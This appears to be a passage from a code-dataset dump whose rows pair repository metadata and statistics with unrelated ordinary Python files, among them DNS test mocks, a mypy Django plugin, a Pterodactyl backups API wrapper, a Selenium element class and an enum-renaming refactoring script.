retrieved_dataset_version = experiment_run.get_dataset_version('train')
path = retrieved_dataset_version.dataset_version.path_dataset_version_info.base_path
assert path.endswith(__file__)
def test_overwrite(self, client, created_datasets, experiment_run, s3_bucket):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
dataset_version = dataset.create_version(__file__)
experiment_run.log_dataset_version('train', dataset_version)
new_dataset_version = dataset.create_version("conftest.py")
experiment_run.log_dataset_version('train', new_dataset_version, overwrite=True)
retrieved_dataset_version = experiment_run.get_dataset_version('train')
path = retrieved_dataset_version.dataset_version.path_dataset_version_info.base_path
assert path.endswith("conftest.py")
| 40.409434 | 118 | 0.67241 | 2,359 | 21,417 | 5.828317 | 0.112336 | 0.074187 | 0.054986 | 0.054549 | 0.763037 | 0.72478 | 0.674158 | 0.652484 | 0.645938 | 0.618009 | 0 | 0.009578 | 0.239483 | 21,417 | 529 | 119 | 40.485822 | 0.834541 | 0.030536 | 0 | 0.602041 | 0 | 0.002551 | 0.073333 | 0.00593 | 0 | 0 | 0 | 0.00189 | 0.173469 | 1 | 0.107143 | false | 0.005102 | 0.045918 | 0.010204 | 0.211735 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fbbecee3794fdefec8c8a2d4708d4a461d5114d3 | 1,629 | py | Python | sewer/dns_providers/tests/test_utils.py | m4ldonado/sewer | 4d4930cf4dd8b6efb8e23629fea37a2a2580151f | [
"MIT"
] | null | null | null | sewer/dns_providers/tests/test_utils.py | m4ldonado/sewer | 4d4930cf4dd8b6efb8e23629fea37a2a2580151f | [
"MIT"
] | null | null | null | sewer/dns_providers/tests/test_utils.py | m4ldonado/sewer | 4d4930cf4dd8b6efb8e23629fea37a2a2580151f | [
"MIT"
] | null | null | null | import json
class MockResponse(object):
"""
mock python-requests Response object
"""
def __init__(self, status_code=200, content=None):
if not content:
content = {}
content.update({
'something': 'ok',
'result': [{'name': 'example.com', 'id': 'some-mock-dns-zone-id'}]
})
self.content = json.dumps(content).encode()
self.status_code = status_code
self.headers = {}
def json(self):
return json.loads(self.content.decode())
class mockLibcloudDriverZone(object):
"""
A mock of a dns zone in a libcloud drivers dns
"""
id = 'mock-zone-id-1'
def create_record(self, name, type, data):
pass
class mockLibcloudDriver(object):
"""
a mock of libcloud.dns.drivers.auroradns.AuroraDNSDriver class
"""
def __init__(self, key, secret):
pass
def get_zone(self, domainSuffix):
mock_zone = mockLibcloudDriverZone()
return mock_zone
def list_records(self, zone):
import collections
DnsRecords = collections.namedtuple('DnsRecords', 'id name type')
one_dns_record = DnsRecords(id='1', name='_acme-challenge', type='TXT')
records = [one_dns_record]
return records
def get_record(self, zone_id, record_id):
return 'mock-record'
def delete_record(self, record):
pass
def mockLibcloudGetDriver(provider):
"""
a mock of the libcloud.dns.providers.get_driver function
"""
return mockLibcloudDriver
class MockDnsResolver(object):
canonical_name = 'canonical.name'
| 23.271429 | 79 | 0.623082 | 184 | 1,629 | 5.369565 | 0.396739 | 0.030364 | 0.021255 | 0.026316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00416 | 0.262124 | 1,629 | 69 | 80 | 23.608696 | 0.817804 | 0.124616 | 0 | 0.078947 | 0 | 0 | 0.098901 | 0.015385 | 0 | 0 | 0 | 0 | 0 | 1 | 0.236842 | false | 0.078947 | 0.052632 | 0.052632 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
837d9f5cce2df95dc2fc8e658931ae03ce48abda | 129 | py | Python | settings/laser_safety_shutter_settings.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
] | null | null | null | settings/laser_safety_shutter_settings.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
] | 1 | 2019-10-22T21:28:31.000Z | 2019-10-22T21:39:12.000Z | settings/laser_safety_shutter_settings.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
] | 2 | 2019-06-06T15:06:46.000Z | 2020-07-20T02:03:22.000Z | description = 'Laser Safety Shutter'
prefix = '14IDB:B1Bi0'
target = 0.0
command_value = 1.0
auto_open = 0.0
EPICS_enabled = True | 21.5 | 36 | 0.744186 | 21 | 129 | 4.428571 | 0.809524 | 0.043011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0.147287 | 129 | 6 | 37 | 21.5 | 0.754545 | 0 | 0 | 0 | 0 | 0 | 0.238462 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83899ce2972b38534d54b11e79940124827f4e44 | 1,655 | py | Python | mypy_django_plugin/transformers/request.py | ticosax/django-stubs | 2f7fac2eaf87fe1e50d635ab14bcbe6c475dabc8 | [
"MIT"
] | 1 | 2021-02-08T12:20:15.000Z | 2021-02-08T12:20:15.000Z | mypy_django_plugin/transformers/request.py | ticosax/django-stubs | 2f7fac2eaf87fe1e50d635ab14bcbe6c475dabc8 | [
"MIT"
] | 7 | 2021-03-05T23:08:02.000Z | 2022-03-12T00:47:19.000Z | mypy_django_plugin/transformers/request.py | ticosax/django-stubs | 2f7fac2eaf87fe1e50d635ab14bcbe6c475dabc8 | [
"MIT"
] | null | null | null | from mypy.plugin import AttributeContext
from mypy.types import Instance
from mypy.types import Type as MypyType
from mypy.types import UnionType
from mypy_django_plugin.django.context import DjangoContext
from mypy_django_plugin.lib import helpers
def set_auth_user_model_as_type_for_request_user(ctx: AttributeContext, django_context: DjangoContext) -> MypyType:
    # Imported here because django isn't properly loaded yet when module is loaded
    from django.contrib.auth.base_user import AbstractBaseUser
    from django.contrib.auth.models import AnonymousUser

    abstract_base_user_info = helpers.lookup_class_typeinfo(helpers.get_typechecker_api(ctx), AbstractBaseUser)
    anonymous_user_info = helpers.lookup_class_typeinfo(helpers.get_typechecker_api(ctx), AnonymousUser)
    # This shouldn't be able to happen, as we managed to import the models above.
    assert abstract_base_user_info is not None
    assert anonymous_user_info is not None

    if ctx.default_attr_type != UnionType([Instance(abstract_base_user_info, []), Instance(anonymous_user_info, [])]):
        # Type has been changed from the default in django-stubs.
        # I.e. HttpRequest has been subclassed and user-type overridden, so let's leave it as is.
        return ctx.default_attr_type

    auth_user_model = django_context.settings.AUTH_USER_MODEL
    user_cls = django_context.apps_registry.get_model(auth_user_model)
    user_info = helpers.lookup_class_typeinfo(helpers.get_typechecker_api(ctx), user_cls)
    if user_info is None:
        return ctx.default_attr_type

    return UnionType([Instance(user_info, []), Instance(anonymous_user_info, [])])
| 47.285714 | 118 | 0.791541 | 237 | 1,655 | 5.257384 | 0.362869 | 0.064205 | 0.041734 | 0.045746 | 0.26565 | 0.199839 | 0.14687 | 0.14687 | 0.14687 | 0.14687 | 0 | 0 | 0.144411 | 1,655 | 34 | 119 | 48.676471 | 0.879944 | 0.178852 | 0 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.047619 | false | 0 | 0.380952 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
838ade99e696aaa513363ba78d50cc0dcf4dcd8c | 1,829 | py | Python | backend/handlers/graphql/types/vdi.py | al-indigo/vmemperor | 80eb6d47d839a4736eb6f9d2fcfad35f0a7b3bb1 | [
"Apache-2.0"
] | null | null | null | backend/handlers/graphql/types/vdi.py | al-indigo/vmemperor | 80eb6d47d839a4736eb6f9d2fcfad35f0a7b3bb1 | [
"Apache-2.0"
] | 8 | 2017-10-11T13:26:10.000Z | 2021-12-13T20:27:52.000Z | backend/handlers/graphql/types/vdi.py | ispras/vmemperor | 80eb6d47d839a4736eb6f9d2fcfad35f0a7b3bb1 | [
"Apache-2.0"
] | 4 | 2017-07-27T12:25:42.000Z | 2018-01-28T02:06:26.000Z | from enum import auto
import graphene
from serflag import SerFlag
from handlers.graphql.interfaces.aclxenobject import GAclXenObject
from handlers.graphql.interfaces.quotaobject import GQuotaObject
from handlers.graphql.resolvers.accessentry import resolve_accessentries
from handlers.graphql.resolvers.myactions import resolve_myactions, resolve_owner
from handlers.graphql.resolvers.sr import srType, srContentType
from handlers.graphql.types.access import create_access_type
from handlers.graphql.types.base.gxenobjecttype import GXenObjectType
from handlers.graphql.types.vbd import GVBD
from handlers.graphql.utils.query import resolve_one, resolve_many
class VDIActions(SerFlag):
    rename = auto()
    plug = auto()
    destroy = auto()


class VDIType(graphene.Enum):
    '''
    VDI class supports only a subset of VDI types, that are listed below.
    '''
    System = "system"
    User = "user"
    Ephemeral = "ephemeral"


GVDIActions = graphene.Enum.from_enum(VDIActions)
GVDIAccessEntry = create_access_type("GVDIAccessEntry", GVDIActions)


class GVDI(GXenObjectType):
    class Meta:
        interfaces = (GAclXenObject, GQuotaObject)

    access = graphene.Field(graphene.List(GVDIAccessEntry), required=True,
                            resolver=resolve_accessentries(VDIActions))
    my_actions = graphene.Field(graphene.List(GVDIActions), required=True, resolver=resolve_myactions(VDIActions))
    is_owner = graphene.Field(graphene.Boolean, required=True, resolver=resolve_owner(VDIActions))
    SR = graphene.Field(srType, resolver=resolve_one())
    virtual_size = graphene.Field(graphene.Float, required=True)
    VBDs = graphene.List(GVBD, required=True, resolver=resolve_many())
    content_type = graphene.Field(srContentType, required=True)
    type = graphene.Field(VDIType, required=True) | 37.326531 | 114 | 0.772007 | 210 | 1,829 | 6.633333 | 0.338095 | 0.077531 | 0.122757 | 0.077531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141061 | 1,829 | 49 | 115 | 37.326531 | 0.886696 | 0.037726 | 0 | 0 | 0 | 0 | 0.019507 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.352941 | 0 | 0.882353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
83900cfe8e2b666f2ad700e67d2fa38ff64bd216 | 526 | py | Python | Dalitz_simplified/optimisation/classifier_eval_wrapper.py | weissercn/MLTools | 75dc566947437249ad077939941839126eb20016 | [
"MIT"
] | null | null | null | Dalitz_simplified/optimisation/classifier_eval_wrapper.py | weissercn/MLTools | 75dc566947437249ad077939941839126eb20016 | [
"MIT"
] | null | null | null | Dalitz_simplified/optimisation/classifier_eval_wrapper.py | weissercn/MLTools | 75dc566947437249ad077939941839126eb20016 | [
"MIT"
] | null | null | null | import numpy as np
import math
import sys
sys.path.insert(0,'../')
import classifier_eval_simplified
# Write a function like this called 'main'
def main(job_id, params):
    print 'Anything printed here will end up in the output directory for job #%d' % job_id
    print params
    result = classifier_eval_simplified.classifier_eval(params['aC'], params['agamma'], 2)
    with open("optimisation_values.txt", "a") as myfile:
        myfile.write(str(params['aC'])+"\n"+str(params['agamma'])+"\n"+str(result))
    return result
| 35.066667 | 90 | 0.712928 | 79 | 526 | 4.64557 | 0.620253 | 0.114441 | 0.13079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004474 | 0.15019 | 526 | 14 | 91 | 37.571429 | 0.816555 | 0.076046 | 0 | 0 | 0 | 0 | 0.239669 | 0.047521 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
83a1d6cc8f86ff593b3fdcd39417fd16589ca6c8 | 2,330 | py | Python | pydactyl/api/client/servers/backups.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | pydactyl/api/client/servers/backups.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | pydactyl/api/client/servers/backups.py | jozefbonnar/pydactyl | b45ce82ac0e20c786ffd3a65bab959c9bb3226ba | [
"MIT"
] | null | null | null | from pydactyl.api import base
class Backups(base.PterodactylAPI):
    """Pterodactyl Client Server Backups API."""

    def list_backups(self, server_id: str):
        """List backups belonging to the specified server.

        Args:
            server_id(str): Server identifier (abbreviated UUID)
        """
        endpoint = 'client/servers/{}/backups'.format(server_id)
        response = self._api_request(endpoint=endpoint)
        return response

    def create_backup(self, server_id: str):
        """Create a new backup of the specified server.

        Args:
            server_id(str): Server identifier (abbreviated UUID)
        """
        endpoint = 'client/servers/{}/backups'.format(server_id)
        response = self._api_request(endpoint=endpoint, mode='POST')
        return response

    def get_backup_detail(self, server_id: str, backup_id: str):
        """Retrieve information about the specified backup.

        Args:
            server_id(str): Server identifier (abbreviated UUID)
            backup_id(str): Backup identifier (long UUID)
        """
        endpoint = 'client/servers/{}/backups/{}'.format(server_id, backup_id)
        response = self._api_request(endpoint=endpoint)
        return response

    def get_backup_download(self, server_id: str, backup_id: str):
        """Generate a download link for the specified backup.

        Args:
            server_id(str): Server identifier (abbreviated UUID)
            backup_id(str): Backup identifier (long UUID)
        """
        endpoint = 'client/servers/{}/backups/{}/download'.format(server_id,
                                                                 backup_id)
        response = self._api_request(endpoint=endpoint)
        return response

    def delete_backup(self, server_id: str, backup_id: str):
        """Delete the specified backup.

        Args:
            server_id(str): Server identifier (abbreviated UUID)
            backup_id(str): Backup identifier (long UUID)
        """
        endpoint = 'client/servers/{}/backups/{}'.format(server_id, backup_id)
        response = self._api_request(endpoint=endpoint, mode='DELETE')
        return response
| 36.984127 | 78 | 0.627897 | 260 | 2,330 | 5.469231 | 0.234615 | 0.056259 | 0.077356 | 0.052743 | 0.706751 | 0.66315 | 0.66315 | 0.608298 | 0.59775 | 0.552743 | 0 | 0 | 0.274249 | 2,330 | 62 | 79 | 37.580645 | 0.840923 | 0.367382 | 0 | 0.434783 | 0 | 0 | 0.122066 | 0.114241 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
83b78a7f448df8273c67d7f82dd180e4fe6e5c26 | 378 | py | Python | tests/interface/wsgi_test.py | Jaymon/endpoints | f3864d4a8e915686fdefac34142a40245fdf2f35 | [
"MIT"
] | 18 | 2018-09-28T23:13:09.000Z | 2021-06-23T20:15:58.000Z | tests/interface/wsgi_test.py | firstopinion/endpoints | f3864d4a8e915686fdefac34142a40245fdf2f35 | [
"MIT"
] | 60 | 2015-01-22T01:10:28.000Z | 2018-02-20T23:54:50.000Z | tests/interface/wsgi_test.py | Jaymon/endpoints | f3864d4a8e915686fdefac34142a40245fdf2f35 | [
"MIT"
] | 8 | 2018-04-22T03:54:56.000Z | 2021-12-02T09:53:42.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
from endpoints.interface.wsgi.client import WebServer
from . import WebTestCase, WebServerTestCase
class WebTest(WebTestCase):
server_class = WebServer
class WebServerTest(WebServerTestCase):
server_class = WebServer
del WebTestCase
del WebServerTestCase
| 19.894737 | 82 | 0.798942 | 40 | 378 | 7.325 | 0.6 | 0.075085 | 0.136519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003058 | 0.134921 | 378 | 18 | 83 | 21 | 0.892966 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.777778 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
83beddcf144789476e4b1319fc268892c73c00f8 | 1,684 | py | Python | JDI/web/selenium/elements/base/base_element.py | jdi-testing/jdi-python | 7c0607b97d4d44b27ea8f532d47c68b8dd00e6f7 | [
"MIT"
] | 5 | 2020-02-14T10:32:01.000Z | 2021-07-22T08:20:28.000Z | JDI/web/selenium/elements/base/base_element.py | jdi-testing/jdi-python | 7c0607b97d4d44b27ea8f532d47c68b8dd00e6f7 | [
"MIT"
] | 54 | 2018-07-27T14:07:33.000Z | 2021-11-08T09:24:16.000Z | JDI/web/selenium/elements/base/base_element.py | jdi-testing/jdi-python | 7c0607b97d4d44b27ea8f532d47c68b8dd00e6f7 | [
"MIT"
] | 1 | 2021-01-20T14:31:52.000Z | 2021-01-20T14:31:52.000Z | from JDI.web.selenium.elements.api_interact.get_element_module import \
GetElementModule
class BaseElement:
    name = None
    parent = None
    avatar = None

    def __init__(self, by_locator=None):
        self.avatar = GetElementModule(by_locator, self)

    def get_driver(self):
        return self.avatar.get_driver()

    def _get_type_name(self):
        return self.__class__.__name__

    def get_name(self):
        return self.name if self.name is not None else self._get_type_name()

    def get_parent(self):
        return self.parent

    def init(self, parent, avatar):
        from JDI.web.selenium.elements.cascade_init import WebCascadeInit
        WebCascadeInit.init_elements(self)
        self.set_avatar(avatar)
        self.set_parent(parent)
        return self

    def set_avatar(self, avatar):
        self.avatar = avatar
        return self

    def set_parent(self, parent):
        self.parent = parent

    def get_locator(self):
        return self.avatar.by_locator

    def __str__(self):
        s = "Name " + self.__class__.__name__
        if "by_locator" in dir(self.avatar):
            if self.avatar.by_locator is not None:
                s += "; Locator: %s:'%s'" % (self.avatar.by_locator[0], self.avatar.by_locator[1])
        if self.parent is not None:
            if "avatar" in dir(self.parent):
                if self.parent.avatar.by_locator is not None:
                    s += "; Parent: %s:'%s'" % (self.parent.avatar.by_locator[0], self.parent.avatar.by_locator[1])
        return s

    def has_locator(self):
        return self.avatar.has_locator()
| 28.542373 | 115 | 0.633017 | 222 | 1,684 | 4.495496 | 0.18018 | 0.09018 | 0.098196 | 0.076152 | 0.295591 | 0.108216 | 0.108216 | 0 | 0 | 0 | 0 | 0.003239 | 0.266627 | 1,684 | 58 | 116 | 29.034483 | 0.804858 | 0 | 0 | 0.139535 | 0 | 0 | 0.033254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.27907 | false | 0 | 0.046512 | 0.162791 | 0.651163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
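The `__str__` in the base_element.py record above builds a human-readable description from the element's `(strategy, value)` locator tuple, appending the parent's locator when one exists. A stripped-down sketch of the same pattern — the `Element` class and the locator tuples are invented here for illustration, not part of the JDI API:

```python
class Element(object):
    """Minimal stand-in for BaseElement's __str__ logic."""

    def __init__(self, by_locator=None, parent=None):
        self.by_locator = by_locator  # e.g. ("id", "submit")
        self.parent = parent

    def __str__(self):
        s = "Name " + self.__class__.__name__
        if self.by_locator is not None:
            # "%s:'%s'" % tuple unpacks (strategy, value) into the message.
            s += "; Locator: %s:'%s'" % self.by_locator
        if self.parent is not None and self.parent.by_locator is not None:
            s += "; Parent: %s:'%s'" % self.parent.by_locator
        return s


parent = Element(("css", "#form"))
child = Element(("id", "submit"), parent=parent)
print(child)  # Name Element; Locator: id:'submit'; Parent: css:'#form'
```

Keeping the locator chain in `__str__` makes failing-test logs self-describing: the message pinpoints both the element and the container it was resolved under.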
83c0792070097bda91e3f26101d57ecf9b27b2ce | 695 | py | Python | community_supplied/Kernel/Vpls/compare-vpls-flood-token-cnt.py | brahmastra2016/healthbot-rules | 1d24acd298266c39d6adb139ff47d14f8b2d452a | [
"Apache-2.0",
"BSD-3-Clause"
] | 43 | 2018-11-27T00:42:45.000Z | 2022-02-24T01:19:39.000Z | community_supplied/Kernel/Vpls/compare-vpls-flood-token-cnt.py | brahmastra2016/healthbot-rules | 1d24acd298266c39d6adb139ff47d14f8b2d452a | [
"Apache-2.0",
"BSD-3-Clause"
] | 266 | 2018-10-26T10:19:04.000Z | 2022-03-16T04:38:29.000Z | community_supplied/Kernel/Vpls/compare-vpls-flood-token-cnt.py | brahmastra2016/healthbot-rules | 1d24acd298266c39d6adb139ff47d14f8b2d452a | [
"Apache-2.0",
"BSD-3-Clause"
] | 99 | 2018-10-25T09:53:55.000Z | 2021-12-07T09:51:59.000Z | from jnpr.junos import Device
from jnpr.junos.utils.config import Config
"""
This function compares the current vpls flood token count in the system with the low threshold and high threshold and returns the result
"""
def compare_vpls_flood_token_cnt(vpls_flood_token_cnt, vpls_flood_token_max, **kwargs):
    val = 0
    low_thresh = float(0.8)*vpls_flood_token_max
    high_thresh = float(0.9)*vpls_flood_token_max
    if vpls_flood_token_cnt < low_thresh:
        val = 0
    elif vpls_flood_token_cnt >= low_thresh and vpls_flood_token_cnt <= high_thresh:
        val = 1
    elif vpls_flood_token_cnt > high_thresh:
        val = 2
    return val
| 34.75 | 136 | 0.700719 | 106 | 695 | 4.273585 | 0.386792 | 0.198676 | 0.309051 | 0.225166 | 0.370861 | 0.353201 | 0.238411 | 0 | 0 | 0 | 0 | 0.01518 | 0.241727 | 695 | 19 | 137 | 36.578947 | 0.844402 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
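The health-check function in the record above maps a token count onto three severity bands: 0 below 80% of the maximum, 1 between 80% and 90% inclusive, and 2 above 90%. A self-contained restatement of that rule (dropping the unused `**kwargs` and Junos imports), handy for checking the boundary cases:

```python
def compare_vpls_flood_token_cnt(cnt, max_tokens):
    # Same banding as the healthbot rule: green < 80%, yellow 80-90%, red > 90%.
    low_thresh = 0.8 * max_tokens
    high_thresh = 0.9 * max_tokens
    if cnt < low_thresh:
        return 0
    elif cnt <= high_thresh:
        return 1
    return 2


print(compare_vpls_flood_token_cnt(70, 100))  # 0
print(compare_vpls_flood_token_cnt(85, 100))  # 1
print(compare_vpls_flood_token_cnt(95, 100))  # 2
```

Both 80% and 90% of the maximum land in the middle band, matching the `>= low` / `<= high` comparisons in the original.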
83c6dd68cad3a17adad28fffee8faa8ea84c1e1b | 14,464 | py | Python | tools/refactoring/enumfixes.py | ImagiaViz/inviwo | a00bb6b0551bc1cf26dc0366c827c1a557a9603d | [
"BSD-2-Clause"
] | 349 | 2015-01-30T09:21:52.000Z | 2022-03-25T03:10:02.000Z | tools/refactoring/enumfixes.py | liu3xing3long/inviwo | 69cca9b6ecd58037bda0ed9e6f53d02f189f19a7 | [
"BSD-2-Clause"
] | 641 | 2015-09-23T08:54:06.000Z | 2022-03-23T09:50:55.000Z | tools/refactoring/enumfixes.py | liu3xing3long/inviwo | 69cca9b6ecd58037bda0ed9e6f53d02f189f19a7 | [
"BSD-2-Clause"
] | 124 | 2015-02-27T23:45:02.000Z | 2022-02-21T09:37:14.000Z | import sys
import os
import re
import colorama
colorama.init()
import refactoring # Note: refactoring.py need to be in the current working directory
paths = [
"/Users/petst/Work/Projects/Inviwo-Developent/Private/Inviwo-dev",
"/Users/petst/Work/Projects/Inviwo-Developent/Private/Inviwo-research"
]
#paths = [
# "C:/Users/petst55/Work/Inviwo/Inviwo-dev",
# "C:/Users/petst55/Work/Inviwo/Inviwo-research"
#]
excludespatterns = ["*/ext/*", "*moc_*", "*cmake*", "*/proteindocking/*", "*/proteindocking2/*", "*/genetree/*", "*/vrnbase/*"];
files = refactoring.find_files(paths, ['*.h', '*.cpp'], excludes=excludespatterns)
def replace(pattern, replacement):
    print("Matches:")
    matches = refactoring.find_matches(files, pattern)
    print("\n")
    print("Replacing:")
    refactoring.replace_matches(matches, pattern, replacement)
numericTypeReplacements = {
"DataFormatEnums::NumericType" : "NumericType",
"DataFormatEnums::NOT_SPECIALIZED_TYPE" : "NumericType::NotSpecialized",
"DataFormatEnums::FLOAT_TYPE" : "NumericType::Float",
"DataFormatEnums::UNSIGNED_INTEGER_TYPE" : "NumericType::UnsignedInteger",
"DataFormatEnums::SIGNED_INTEGER_TYPE" : "NumericType::SignedInteger"
};
dataFormatIdReplacements = {
"DataFormatEnums::Id" : "DataFormatId",
"DataFormatEnums::NOT_SPECIALIZED" : "DataFormatId::NotSpecialized",
"DataFormatEnums::FLOAT16" : "DataFormatId::Float16",
"DataFormatEnums::FLOAT32" : "DataFormatId::Float32",
"DataFormatEnums::FLOAT64" : "DataFormatId::Float64",
"DataFormatEnums::INT8" : "DataFormatId::Int8",
"DataFormatEnums::INT16" : "DataFormatId::Int16",
"DataFormatEnums::INT32" : "DataFormatId::Int32",
"DataFormatEnums::INT64" : "DataFormatId::Int64",
"DataFormatEnums::UINT8" : "DataFormatId::UInt8",
"DataFormatEnums::UINT16" : "DataFormatId::UInt16",
"DataFormatEnums::UINT32" : "DataFormatId::UInt32",
"DataFormatEnums::UINT64" : "DataFormatId::UInt64",
"DataFormatEnums::Vec2FLOAT16" : "DataFormatId::Vec2Float16",
"DataFormatEnums::Vec2FLOAT32" : "DataFormatId::Vec2Float32",
"DataFormatEnums::Vec2FLOAT64" : "DataFormatId::Vec2Float64",
"DataFormatEnums::Vec2INT8" : "DataFormatId::Vec2Int8",
"DataFormatEnums::Vec2INT16" : "DataFormatId::Vec2Int16",
"DataFormatEnums::Vec2INT32" : "DataFormatId::Vec2Int32",
"DataFormatEnums::Vec2INT64" : "DataFormatId::Vec2Int64",
"DataFormatEnums::Vec2UINT8" : "DataFormatId::Vec2UInt8",
"DataFormatEnums::Vec2UINT16" : "DataFormatId::Vec2UInt16",
"DataFormatEnums::Vec2UINT32" : "DataFormatId::Vec2UInt32",
"DataFormatEnums::Vec2UINT64" : "DataFormatId::Vec2UInt64",
"DataFormatEnums::Vec3FLOAT16" : "DataFormatId::Vec3Float16",
"DataFormatEnums::Vec3FLOAT32" : "DataFormatId::Vec3Float32",
"DataFormatEnums::Vec3FLOAT64" : "DataFormatId::Vec3Float64",
"DataFormatEnums::Vec3INT8" : "DataFormatId::Vec3Int8",
"DataFormatEnums::Vec3INT16" : "DataFormatId::Vec3Int16",
"DataFormatEnums::Vec3INT32" : "DataFormatId::Vec3Int32",
"DataFormatEnums::Vec3INT64" : "DataFormatId::Vec3Int64",
"DataFormatEnums::Vec3UINT8" : "DataFormatId::Vec3UInt8",
"DataFormatEnums::Vec3UINT16" : "DataFormatId::Vec3UInt16",
"DataFormatEnums::Vec3UINT32" : "DataFormatId::Vec3UInt32",
"DataFormatEnums::Vec3UINT64" : "DataFormatId::Vec3UInt64",
"DataFormatEnums::Vec4FLOAT16" : "DataFormatId::Vec4Float16",
"DataFormatEnums::Vec4FLOAT32" : "DataFormatId::Vec4Float32",
"DataFormatEnums::Vec4FLOAT64" : "DataFormatId::Vec4Float64",
"DataFormatEnums::Vec4INT8" : "DataFormatId::Vec4Int8",
"DataFormatEnums::Vec4INT16" : "DataFormatId::Vec4Int16",
"DataFormatEnums::Vec4INT32" : "DataFormatId::Vec4Int32",
"DataFormatEnums::Vec4INT64" : "DataFormatId::Vec4Int64",
"DataFormatEnums::Vec4UINT8" : "DataFormatId::Vec4UInt8",
"DataFormatEnums::Vec4UINT16" : "DataFormatId::Vec4UInt16",
"DataFormatEnums::Vec4UINT32" : "DataFormatId::Vec4UInt32",
"DataFormatEnums::Vec4UINT64" : "DataFormatId::Vec4UInt64",
"DataFormatEnums::NUMBER_OF_FORMATS" : "DataFormatId::NumberOfFormats"
}
dataFormatTypeReplacements = {
"DataFLOAT16" : "DataFloat16",
"DataFLOAT32" : "DataFloat32",
